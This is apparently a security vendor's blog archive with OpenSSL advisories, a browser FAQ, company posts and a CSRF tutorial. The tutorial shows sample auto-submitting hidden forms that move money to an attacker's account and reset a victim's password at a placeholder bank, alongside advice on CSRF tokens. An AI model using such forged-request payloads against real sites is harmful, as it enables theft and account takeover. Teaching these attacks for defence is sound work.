Tag Archives: application security

SSL/TLS MITM vulnerability CVE-2014-0224

We are aware of the OpenSSL advisory posted at https://www.openssl.org/news/secadv_20140605.txt. OpenSSL is vulnerable to a ChangeCipherSpec (CCS) Injection Vulnerability.

An attacker using a carefully crafted handshake can force the use of weak keying material in OpenSSL SSL/TLS clients and servers.

The attack can only be performed between a vulnerable client *and* a vulnerable server. Desktop Web Browser clients (i.e. Firefox, Chrome Internet Explorer) and most mobile browsers( i.e. Safari mobile, Firefox mobile) are not vulnerable, because they do not use OpenSSL. Chrome on Android does use OpenSSL, and may be vulnerable. All other OpenSSL clients are vulnerable in all versions of OpenSSL.

Servers are only known to be vulnerable in OpenSSL 1.0.1 and 1.0.2-beta1. Users of OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution.

OpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za.
OpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m.
OpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h.

WhiteHat is actively working on implementing a check for sites under service. We will update this blog with additional information as it is available.

Editor’s note:
June 6, 2014
WhiteHat has added testing to identify websites currently running affected versions of OpenSSL across all of our DAST service lines. These vulnerabilities will open as “Insufficient Transport Layer Protection” in the Sentinel interface. WhiteHat recommends that all assets including non-web application servers and sites that are currently not under service with WhiteHat be tested and patched.

If you have any questions regarding the the new CCS Injection SSL Vulnerability please email support@whitehatsec.com and a representative will be happy to assist.

Podcast: An Anthropologist’s Approach to Application Security

In this edition of the WhiteHat Security podcast, I talk with Walt Williams, Senior Security and Compliance Manager Lattice Engines. Hear how Walt went from Anthropologist to Security Engineer, his approach to building relationships with developers, and why his biggest security surprise involved broken windshields.

Want to do a podcast with us? Signup to become an “Unsung Hero”.

About our “Unsung Hero Program”
Every day app sec professionals tirelessly protect the Web, and we recognize that this is largely owed to a series of small victories. These represent untold stories. We want to help share your story. To learn more click here.

Heartbleed OpenSSL Vulnerability

Monday afternoon a flaw in the way OpenSSL handles the TLS heartbeat extension was revealed and nicknamed “The Heartbleed Bug.” According to the OpenSSL Security Advisory, Heartbleed reveals ‘a missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.’ The flaw creates an opening in SSL/TLS which an attacker could use to obtain private keys, usernames/passwords and content.

OpenSSL versions 1.0.1 through 1.0.1f as well as 1.0.2-beta1 are affected. The recommended fix is upgrade to 1.0.1g and to reissue certs for any sites that were using compromised OpenSSL versions.

WhiteHat has added testing to identify websites currently running affected versions. These vulnerabilities will open as “Insufficient Transport Layer Protection” in the Sentinel interface. These tests are currently being run across all of our clients’ applications. We expect to get full coverage of all applications under service within the next two days. WhiteHat also recommends that all assets including non-web application servers and sites that are currently not under service with WhiteHat be tested. Several tools have been made available to test for open issues. To access an online testing tool visit http://filippo.io/Heartbleed/. Another tool can be found on GitHub at https://github.com/titanous/heartbleeder and a new script can be obtained from http://seclists.org/nmap-dev/2014/q2/36

If you have any questions regarding the Heartbleed Bug please email support@whitehatsec.com and a representative will be happy to assist. Below you will find a link to the OpenSSL Security Advisory: https://www.openssl.org/news/secadv_20140407.txt Reference for Heartbeat extension https://tools.ietf.org/html/rfc6520

Aviator: Some Answered Questions

We publicly released Aviator on Monday, Oct 21. Since then we’ve received an avalanche of questions, suggestions, and feature requests regarding the browser. The level of positive feedback and support has been overwhelming. Lots of great ideas and comments that will help shape where we go from here. If you have something to share, a question or concern, please contact us at aviator@whitehatsec.com.

Now let’s address some of the most often heard questions so far:

Where’s the source code to Aviator?

WhiteHat Security is still in the very early stages of Aviator’s public release and we are gathering all feedback internally. We’ll be using this feedback to prioritize where our resources will be spent. Deciding whether or not to release the source code is part of these discussions.

Aviator unitizes open source software via Chromium, don’t you have to release the source?

WhiteHat Security respects and appreciates the open source software community. We’ve long supported various open source organizations and projects throughout our history. We also know how important OSS licenses are, so we diligently studied what was required for when Aviator would be publicly available.

Chromium, of which Aviator is derived, contains a wide variety of OSS licenses. As can be seen here using aviator://credits/ in Aviator or chrome://credits/ in Google Chrome. The portions of the code we modified in Aviator are all under BSD, or BSD-like licenses. As such, publishing our changes is, strictly speaking, not a licensing requirement. This is not to say we won’t in the future, just that we’re discussing it internally first. Doing so is a big decision that shouldn’t be taken lightly. Of course, when and/if we make a change to the GPL or similar licensed software in Chromium, we’ll happily publish the updates as required.

When is Aviator going to be available for Windows, Linux, iOS, Android, etc.?

Aviator was originally an internal project designed for WhiteHat Security employees. This served as a great environment to test our theories about how a truly secure and privacy-protecting browser should work. Since WhiteHat is primarily a Mac shop, we built it for OS X. Those outside of WhiteHat wanted to use the same browser that we did, so this week we made Aviator publicly available.

We are still in the very early days of making Aviator available to the public. The feedback so far has been very positive and requests for a Windows, Linux and even open source versions are pouring in, so we are definitely determining where to focus our resources on what should come next, but there is not definite timeframe yet of when other versions will be available.

How long has WhiteHat been working on Aviator?

Browser security has been a subject of personal and professional interest for both myself, and Robert “RSnake” Hansen (Director, Product Management) for years. Both of us have discussed the risks of browser security around the world. A big part of Aviator research was spent creating something to protect WhiteHat employees and the data they are responsible for. Outside of WhiteHat many people ask us what browser we use. Individually our answer has been, “mine.” Now we can be more specific: that browser is Aviator. A browser we feel confident in using not only for our own security and privacy, but one we may confidently recommend to family and friends when asked.

Browsers have pop up blockers to deal with ads. What is different about Aviator’s approach?

Popup blockers used to work wonders, but advertisers switched to sourcing in JavaScript and actually putting content on the page. They no longer have to physically create a new window because they can take over the entire page. Using Aviator, the user’s browser doesn’t even make the connection to an advertising networks’ servers, so obnoxious or potentially dangerous ads simply don’t load.

Why isn’t the Aviator application binary signed?

During the initial phases of development we considered releasing Aviator as a Beta through the Mac Store. Browsers attempt to take advantage of the fastest method of rendering they can. These APIs are sometimes unsupported by the OS and are called “private APIs”. Apple does not support these APIs because they may change and they don’t want to be held accountable for when things break. As a result, while they allow people to use their undocumented and highly speed private APIs, they don’t allow people to distribute applications that use private APIs. We can speculate the reason being that users are likely to think it’s Apple’s fault as opposed to the program when things break. So after about a month of wrestling with it, we decided that for now, we’d avoid using the Mac Store. In the shuffle we didn’t continue signing the binaries as we had been. It was simply an oversight.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Why is Aviator’s application directory world-writable?

During the development process all of our developers were on dedicated computers, not shared computers. So this was an oversight brought on by the fact that there was no need to hide data from one another and therefore chmod permissions were too lax as source files were being copied and edited. This wouldn’t have been an issue if the permissions had been changed back to their less permissive state, but it was missed. We will get it fixed in an upcoming release.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Does Aviator support Chrome extensions?

Yes, all Chrome extensions should function under Aviator. If an issue comes up, please report it to aviator@whitehatsec.com so we can investigate.

Wait a minute, first you say, “if you aren’t paying you are the product,” then you offer a free browser?
Fair point. Like we’ve said, Aviator started off as an internal project simply to protect WhiteHat employees and is not an official company “product.” Those outside the company asked if they could use the same browser that we do. Aviator is our answer to that. Since we’re not in the advertising and tracking business, how could we say no? At some point in the future we’ll figure out a way to generate revenue from Aviator, but in the mean time, we’re mostly interested in offering a browser that security and privacy-conscious people want to use.

Have you gotten and feedback from the major browser vendors about Aviator? If so, what has it been?

We have not received any official feedback from any of the major browser vendors, though there has been some feedback from various employees of those vendors shared informally over Twitter. Some feedback has been positive, others negative. In either case, we’re most interested in server the everyday consumer.

Keep the questions and feedback coming and we will continue to endeavor to improve Aviator in ways that will be beneficial to the security community and to the average consumer.

What’s the Difference between Aviator and Chromium / Google Chrome?

Context:

It’s a fundamental rule of Web security: a Web browser must be able to defend itself against a hostile website. Presently, in our opinion, the market share leading browsers cannot do this adequately. This is an every day threat to personal security and privacy for the more than one billion people online, which includes us. We’ve long held and shared this point of view at WhiteHat Security. Like any sufficiently large company, we have many internal staff members who aren’t as tech savvy as WhiteHat’s Threat Research Center, so we had the same kind of security problem that the rest of the industry had: we had to rely on educating our users, because no browser on the market was suitable for our security needs. But education is a flawed approach – there are always new users and new security guidelines. So instead of engaging in a lengthy educational campaign, we began designing an internal browser that would be secure and privacy-protecting enough for our own users — by default. Over the years a great many people — friends, family members, and colleagues alike — have asked us what browser we recommend, even asked us what browser their children should use. Aviator became our answer.

Why Aviator:

The attacks a website can generate against a visiting browser are diverse and complex, but can be broadly categorized in two types. The first type of attack is designed to escape the confines of the browser walls and infect the desktop with malware. Today’s top tier browser defenses include software security in the browser core, an accompanying sandbox, URL blacklists, silent-updates, and plug-in click-to-play. Well-known browser vendors have done a great job in this regard and should be commended. No one wins when users desktops become part of a botnet.

Unfortunately, the second type of browser attack has been left largely undefended. These attacks are pernicious and carry out their exploits within the browser walls. They typically don’t implant malware, but they are indeed hazardous to online security and privacy. I’ve previously written up a lengthy 8-part blog post series on the subject documenting the problems. For a variety of reasons, these issues have not been addressed by the leading browser vendors. Rather than continue asking for updates that would likely never come, we decided we could do it ourselves.

To create Aviator we leveraged open source Chromium, the same browser core used by Google Chrome. Then, because the BSD license of Chromium allows us, we made many very particular changes to the code and configuration to enhance security and privacy. We named our product Aviator. Many people are eager to learn what exactly the differences are, so let’s go over them.

Differences:

  1. Protected Mode (Incognito Mode) / Not Protected Mode:
    TL;DR All Web history, cache, cookies, auto-complete, and local storage data is deleted after restart.
    Most people are unaware that there are 12 or more locations that websites may store cookie and cookie-like data in a browser. Cookies are typically used to track your surfing habits from one website to the next, but they also expose your online activity to nosy people with access to your computer. Protected Mode purges these storage areas automatically with each browser restart. While other browsers have this feature or something similar, it is not enabled by default, which can make it a chore to use. Aviator launches directly into Protected Mode by default and clearly indicates the mode of the current window. The security / privacy side effect of Protected Mode also helps protect against browser auto-complete hacking, login detection, and deanonymization via clickjacking by reducing the amount of session states you have open – due to an intentional lack of persistence in the browser over different sessions.
  2. Connection Control: 
    TL;DR Rules for controlling the connections made by Aviator. By default, Aviator blocks Intranet IP-addresses (RFC1918).
    When you visit a website, it can instruct your browser to make potentially dangerous connections to internal IP addresses on your network — IP addresses that could not otherwise be connected to from the outside (NAT). Exploitation may lead to simple reconnaissance of internet networks, or it may permanently compromise your network by overwriting the firmware on the router. Without installing special third-party software, it’s impossible to block any bit of Web code from carrying out browser-based intranet hacking. If Aviator happens to be blocking something you want to be able to get to, Connection Control allows the user to create custom rules — or temporarily use another browser.
  3. Disconnect bundled (Disconnect.me): 
    TL;DR Blocks ads and 3rd-party trackers.

    Essentially every ad on every website your browser encounters is tracking you, storing bits of information about where you go and what you do. These ads, along with invisible 3rd-party trackers, also often carry malware designed to exploit your browser when you load a page, or to try to trick you into installing something should you choose to click on it. Since ads can be authored by anyone, including attackers, both ads and trackers may also harness your browser to hack other systems, hack your intranet, incriminate you, etc. Then of course the visuals in the ads themselves are often distasteful, offensive, and inappropriate, especially for children. To help protect against tracking, login detection and deanonymization, auto cross-site scripting, drive-by-downloads, and evil cross-site request forgery delivered through malicious ads, we bundled in the Disconnect extension, which is specifically designed to block ads and trackers. According to the Chrome web store, over 400,000 people are already using Disconnect to protect their privacy. Whether you use Aviator or not, we recommend that you use Disconnect too (Chrome / Firefox supported). We understand many publishers depend on advertising to fund the content. They also must understand that many who use ad blocking software aren’t necessarily anti-advertising, but more pro security and privacy. Ads are dangerous. Publishers should simply ask visitors to enable ads on the website to support the content they want to see, which Disconnect’s icon makes it easy to do with a couple of mouse-clicks. This puts the power and the choice into the hands of the user, which is where we believe it should be.
  4. Block 3rd-party Cookies: 
    TL;DR Default configuration update. 

    While it’s very nice that cookies, including 3rd-party cookies, are deleted when the browser is closed, it’s even better when 3rd-party cookies are not allowed in the first place. Blocking 3rd-party cookies helps protect against tracking, login detection, and deanonymization during the current browser session.
  5. DuckDuckGo replaces Google search: 
    TL;DR Privacy enhanced replacement for the default search engine. 

    It is well-known that Google search makes the company billions of dollars annually via user advertising and user tracking / profiling. DuckDuckGo promises exactly the opposite, “Search anonymously. Find instantly.” We felt that that was a much better default option. Of course if you prefer another search engine (including Google), you are free to change the setting.
  6. Limit Referer Leaks: 
    TL;DR Referers no longer leak cross-domain, but are only sent same-domain by default. 

    When clicking from one link to the next, browsers will tell the destination website where the click came from via the Referer header (intentionally misspelled). Doing so could possibly leak sensitive information such as the search keywords used, internal IPs/hostnames, session tokens, etc. These leaks are often caused by the referring URL and offer little, if any, benefit to the user. Aviator therefore only sends these headers within the same domain.
  7. Plug-Ins Click-to-Play: 
    TL;DR Default configuration update enabled by default. 

    Plug-ins (E.g. Flash and Java) are a source for tracking, malware exploitation, and general annoyance. Plug-ins often keep their own storage for cookie-like data, which isn’t easy to delete, especially from within the browser. Plug-ins are also a huge attack vector for malware infection. Your browser might be secure, but the plug-ins are not and one must update constantly. Then of course all those annoying sounds and visuals made by plug-ins which are difficult to identify and block once they load. So, we blocked them all by default. When you want to run a plug-in, say on YouTube, just one-click on the puzzle piece. If you want a website to always load the plug-ins, that’s a configuration change as well. “Always allow plug-ins on…”
  8. Limit data leakage to Google: 
    TL;DR Default configuration update.

    In Aviator we’ve disabled “Use a web service to help resolve navigation errors” and “Use a prediction service to help complete searches and URLs typed in the address bar” by default. We also removed all options to sync / login to Google, and the tracking traffic sent to Google upon Chromium installation. For many of the same reasons that we have defaulted to DuckDuckGo as a search engine, we have limited what is sent in the browser to Google to protect your privacy. If you chose to use Google services, that is your choice. If you chose not to though, it can be difficult in some browsers. Again, our mantra is choice – and this gives you the choice.
  9. Do Not Track: 
    TL;DR Default configuration update.

    Enabled by default. While we prefer “Can-Not-Track” to “Do-Not-Track”, we figure it was safe enough to enable the “Do Not Track” signal by default in the event it gains traction.

We so far have appreciated the response to WhiteHat Aviator and welcome additional questions and feedback. Our goal is to continue to make this a better and more secure browser option for consumers. Please continue to spread the word and share your thoughts with us. Please download it and give it a test run. Let us know what you think! Click here to learn more about the Aviator browser.

20,000

20,000. That’s the number of websites we’ve assessed for vulnerabilities with WhiteHat Sentinel. Just saying that number alone really doesn’t do it any justice though. The milestone doesn’t capture the gravity and importance of the accomplishment, nor does it fully articulate everything that goes into that number, and what it took to get here. As I reflect on 20,000 websites, I think back to the very early days when so many people told us our model could never work, that we’d never see 1,000 sites, let alone 20x that number. (By the way, I remember their names distinctly ;).) In fairness, what they couldn’t fully appreciate then is “Web security” in terms of what it really takes to scale, which means they truly didn’t understand “Web security.”

When WhiteHat Security first started back in late 2001, consultants dominated the vulnerability assessment space. If a website was [legally] tested for vulnerabilities, it was done by an independent third-party. A consultant would spend roughly a week per website, scanning, prodding around, modifying cookies, URLs and hidden form fields, and then finally deliver a stylized PDF report documenting their findings (aka “the annual assessment”). A fully billed consultant might be able to comprehensively test 40 individual websites per year, and the largest firms would maybe have many as 50 consultants. So collectively, the entire company could only get to about 2,000 websites annually. This is FAR shy of just the 1.8 million SSL-serving sites on the Web. This exposed an unacceptable limitation of their business model.

WhiteHat, at the time of this writing, handles 10x the workload of any consulting firm we’re aware of, and we’re nowhere near capacity. Not only that, WhiteHat Sentinel is assessing these 20,000 websites on a roughly weekly basis, not just once a year! That’s orders of magnitude more security value delivered than what the one-time assessments can possibly provide. Remember, the Web is a REALLY big place, like 700 million websites big in total. And that right there is what Web security is all about, scale. If any solution is unable to scale, it’s not a Web security solution. It’s a one-off. It might be a perfectly acceptable one-off, but a one-off none-the-less.

Achieving scalability in Web security must take into account the holy trinity, a symbiotic combination of People, Process, and Technology – in that order. No [scalable] Web security solution I’m aware of can exist without all three. Not developer training, not threat modeling, not security in QA, not Web application firewalls, not centralized security controls, and certainly not vulnerability assessment. Nothing. No technological innovation can replace the need for the other two factors. The best we can expect of technology is to increase the efficiency of people and processes. We’ve understood this at WhiteHat Security since day one, and it’s one of the biggest reasons WhiteHat Security continues to grow and be successful where many others have gone by the wayside.

Over the years, while the vulnerabilities themselves have not really changed much, Web security culture definitely has. As the industry matures and grows, and awareness builds, we see the average level of Web security competency decrease! This is something to be expected. The industry is no longer dominated by a small circle of “elites.” Today, most in this field are beginners, with 0 – 3 years of work experience, and this is a very good sign.

That said, there is still a huge skill and talent debt everyone must be mindful of. So the question is: in the labor force ecosystem, who is in the best position to hire, train, and retain Web security talent – particularly the Breaker (vulnerability finders) variety – security vendors or enterprises? Since vulnerability assessment is not and should not be in most enterprises’ core competency, AND the market is highly competitive for talent, we believe the clear answer is the former. This is why we’ve invested so greatly in our Threat Research Center (TRC) – our very own professional Web hacker army.

We started building our TRC more than a decade ago, recruiting and training some of the best and brightest minds, many of whom have now joined the ranks of the Web security elite. We pride ourselves on offering our customers not only a very powerful and scalable solution, but also an “army of hackers” – more than 100 strong and growing – that is at the ready, 24×7, to hack them first. “Hack Yourself First” is a motto that we share proudly, so our customers can be made aware of the vulnerabilities that exist on their sites and can fix them before the bad guys exploit them.

That is why crossing the threshold of 20,000 websites under management is so impressive. We have the opportunity to assess all these websites in production – as they are constantly updating and changing – on a continuous basis. This arms our team of security researchers with the latest vulnerability data for testing and measuring and ultimately protecting our customers.

Other vendors could spend millions of dollars building the next great technology over the next 18 months, but they cannot build an army of hackers in 18 months; it just cannot be done. Our research and development department is constantly working on ways to improve our methods of finding vulnerabilities, whether with our scanner or by understanding business logic vulnerabilities. They’re also constantly updated with new 0-days and other vulnerabilities that we try to incorporate into our testing. These are skills that take time to cultivate and strengthen and we have taken years to do just that.

So, I have to wonder: what will 200,000 websites under management look like? It’s hard to know, really. We had no idea 10+ years ago what getting to 20,000 would look like, and we certainly never would have guessed that it would mean we would be processing more than 7TB of data over millions of dollars of infrastructure per week. That said, given the speed at which the Internet is growing and the speed at which we are growing with it, we could reach 200,000 sites in the next 18 months with. And that is a very exciting possibility.

WhiteHat Sentinel Source is Born!

June 1st 2012 was the official one-year mark since WhiteHat Security and Infrared Security decided to join forces to create WhiteHat Sentinel Source. After a significant amount of hard work from a lot of great people, WhiteHat Sentinel Source has gone public! I’m going to use this opportunity to write up a bit of a nostalgic blog post… while still keeping my Don Draper game face on of course. Having been an application security consultant for years, I’ve developed a pretty big chip on my shoulder as it relates to existing static analysis tools. I said to myself time and time again… “There has to be a better way to do this!” I put that energy to good use and infused our technology and service offering with the following core static analysis values that truly separate WhiteHat Sentinel Source from the competition:

1. Invest in Performance:

In order to support an Agile-paced development world, performance of both scan time and verification turnaround time are critical to success. We are constantly investing in our core technology and processes to ensure we get the fastest turnaround time possible!

2. Support Modern Programming Paradigms:

Development teams have adopted various modern programming paradigms and technologies that throw existing static analysis tools for a loop. Such paradigms and patterns include: Object-Oriented Programming, Aspect-Oriented Programming, Inversion of Control, Dependency Injection, etc. We are constantly striving to ensure that our technology has the ability to support these paradigms to accurately model modern source code!

3. Strive for Actionable Results:

Reviewing 100+ “findings” is a complete burden and dilutes the value of the technology. We are striving for quality over quantity throughout our core engine and RulePack development processes! “No grep-like rules” is something you’ll hear me say frequently.

4. Provide Feedback Early:

Performing source code scans at the end of a development initiative or even when the project distributable can be built is too late! Teams are constantly requesting feedback during the development phases, not at the end. We are constantly striving to ensure our ability to integrate with source code repositories such that we can provide feedback early in the development phase. This coupled with our core technology performance makes daily scans a possibility!

5. Leave Security to Security:

Putting a large static analysis report in front of a developer expecting them to triage and fix the results is a complete waste of time and energy. We are constantly striving to ensure that we enable developers to more effectively remediate significant vulnerabilities by performing the triage ourselves.

While the success of WhiteHat Sentinel Source is attributable to many individuals, there are a few folks who really stand out:

Jerry Hoff (VP, Static Analysis Division):

Jerry is an incredibly well-rounded application security expert and a long-time friend. Jerry played a critical role in disseminating our static analysis strategy to the rest of the team and really bootstrapped our ability to talk about static analysis in a way that actually makes sense to people. I always thought I had a great ability to make application security topics digestible until I met this guy. Very much a forward-thinking person, I refuse to have strategic discussions without his input. Jerry has been helping me push static analysis since day 1 at Infrared Security, and now at WhiteHat. We would have not even gotten half this far without his efforts… thank you Jerry!

Siamak Pazirandeh (Senior Software Architect):

Siamak is an incredibly talented developer, architect, and leader. The benevolent development dictator, Siamak (a.k.a. Max) was responsible for spearheading the integration of static analysis into WhiteHat’s existing DAST service model. This large effort involved designing and building a persistency model for evolving codebases optimized for the purpose of verification, scalability design, service delivery architecture, middleware integration, and overall project leadership. He’s already solved challenges with DAST, why not solve SAST too… thank you Max!

John Melton (Senior Application Security Researcher):

John too is an incredibly well-rounded application security expert with serious technical depth in Java. With his astounding work ethic, attention to detail, and everlasting pursuit of perfection, John Melton has become the lead of the Sentinel Source Java engine and RulePack R&D. His abilities and core values around product development provide me with the confidence I need so that I can focus energies on other development initiatives. He is also one of fewer than five people in the world who can very directly and bluntly call me out on my mistakes without me feeling insulted. I think it has to do with his southern accent… thank you John!

With the core technology in place and our integration with the Sentinel interface, WhiteHat Sentinel Source is ready! We fully intend to shake up this market and will continue to push forward with real innovation. We are making the pledge to strive for accuracy, timeliness and usability with our solution. We look forward to other vendors stepping up to our plate… competition will only make us work harder!!

My First CSRF

My First Cross-Site Request Forgery Experience

A while back I was sifting through the posts of my friends on one of today’s popular social networking sites when I saw an odd video called “baby elephant giving birth” – or something to that effect – posted by several of my friends. This tingled my security-spidey senses. I knew something wasn’t legit, but I didn’t know exactly what. I decided to get on an old desktop I rarely use to check it out.

This is what happened: I click the link and am warned that I’m leaving the safety of socialnetworksite.com. The video opens in a new tab and begins to play. I close the tab and return to my profile to see that I had now posted “baby elephant giving birth” for all of my friends to see. I was a victim of CSRF.

How This Happened

When I originally logged into socialnetworksite.com, it stored my authenticated session within a cookie, and from then on the site would use that cookie to ensure that I am authorized. When I left socialnetworksite.com and loaded the new page, evilsite.example.com, a piece of script was embedded on the evilsite.example.com page that executed upon loading. That script contained a POST request to socialnetworksite.com that posted the baby elephant video to my profile. Because the POST request is sent from my browser, the server checked my browser’s cookies to make sure that I was authorized to make that request, and I was.

How to Protect Against This Occurring as a Developer

The most common and effective form of CSRF protection is with a randomly generated token that is assigned to the beginning of each session and that expires at the end of the active session. You can also generate and expire CSRF tokens for each POST. Some sites use the Viewstate property in ASP.Net sites, but because a Viewstate just records the input data of a form, you can potentially guess what those inputs would be. Granted that a Viewstate is better than no protection at all, a randomly generated CSRF Token is just as easy to implement and much more effective.

Note: If there is Cross-Site Scripting on the same site, the token used is irrelevant, because the attacker can grab the token from your cookies and make whatever authenticated requests he chooses.

How to Avoid This Occurring as a User

Never click on untrusted or unfamiliar links. Make sure that any sensitive web sites you access – your email, banking accounts, etc. – are done in their own browser and kept separate from any other Web surfing.

For a description of how WhiteHat Security detects CSRF, check out Arian Evan’s blog at https://blog.whitehatsec.com/tag/csrf/.

So even though my example of CRSF was relatively harmless, the attack could have just as easily been directed towards a banking website to transfer money. Let’s say I open a link from an email, while currently having an active session at “bigbank.com”.

For transferring money, bigbank.com may have a form that looks something like this on its website:

<form name=”legitForm” action=”/transfer.php” method=”POST”>
<b>From account:<input name="transferFrom" value="" type="text">
<br>To account:<input name="transferTo" value="" type="text">

<br>Amount: <input name=”amount” value=”” type=”text
<span><input name=”transfer” value=”Transfer” type=”submit”></span>

</form>

When you fill out and submit the legitForm, the browser sends a POST request to the server that looks something like this:

POST /transfer.php HTTP/1.1
Host: bigbank.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: PHPSESSID=htg1assvnhfegbsnafgd9ie9m1; username=JoeS; minshare=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

transferFrom=111222&transferTo=111333&amount=1.00&transfer=Transfer

Neither of the previous codes is relevant to the user, but they DO give the attacker the structure to build his own evil POST request containing his account information. The attacker embeds the following code onto his website that you clicked on:

<iframe style=”visibility: hidden” name=”invisibleFrame”>
<form name=”stealMoney” action=http://bigbank.com/transfer.php method=”POST” target=”hidden”>
<input type=”hidden” name=”transferFrom” value=””> ß——-Problem?
<input type=”hidden” name=”transferTo” value=”555666”>
<input type=”hidden” name=”amount” value=”1000000.00”>
<input type=”hidden” name=”transfer” value=”Transfer”>
</form>
<script>document.stealMoney.submit();</script>
</iframe>

This code automatically creates and sends a POST request when the webpage is loaded. Not only does it not require any user action other than loading the website; there is also no indication to the user that a request was ever sent.

Now here’s another example, but using a “change password request,” instead. Let’s say I open a link from an email, while currently having an active session at “bigbank.com”.  Most likely, bigbank.com’s website will have a “Change User’s Password” form that looks something like this:

<form name=”changePass” action=”/changePassword.php” method=”POST”>
<b>New Password: <input name="newPass" value="" type="text">
<br>Confirm Pasword:<input name="confirmPass" value="" type="text">

<span><input name=”passChange” value=”Change” type=”submit”></span>

</form>

When you fill out and submit the valid changePass form, the browser sends a POST request that will look similar to this to the server:

POST /transfer.php HTTP/1.1
Host: bigbank.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: PHPSESSID=htg1assvnhfegbsnafgd9ie9m1; username=JoeS; minshare=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

newPass=iloveyou&confirmPass=iloveyou&passChange=”Change”

Again, while neither of the previous codes is relevant to the user, they DO give the attacker the structure to build his own evil POST request containing the information he wants to submit. The attacker embeds the following code onto his website that you clicked on; then, when the page loads, the code executes:

<iframe style=”visibility: hidden” name=”invisibleFrame”>
<form name=”makePassword” action=http://bigbank.com/changePassword.php method=”POST” target=”hidden”>
<input type=”hidden” name=”newPass” value=”Stolen!”>
<input type=”hidden” name=”confirmPass” value=”Stolen!”>
<input type=”hidden” name=”passChange” value=”Change”>
</form>
<script>document.makePassword.submit();</script>
</iframe>

This code automatically creates and sends a POST request when the webpage is loaded. And, as in the example above, not only is no user action required other than loading the website, there is no indication to the user that a request was ever sent.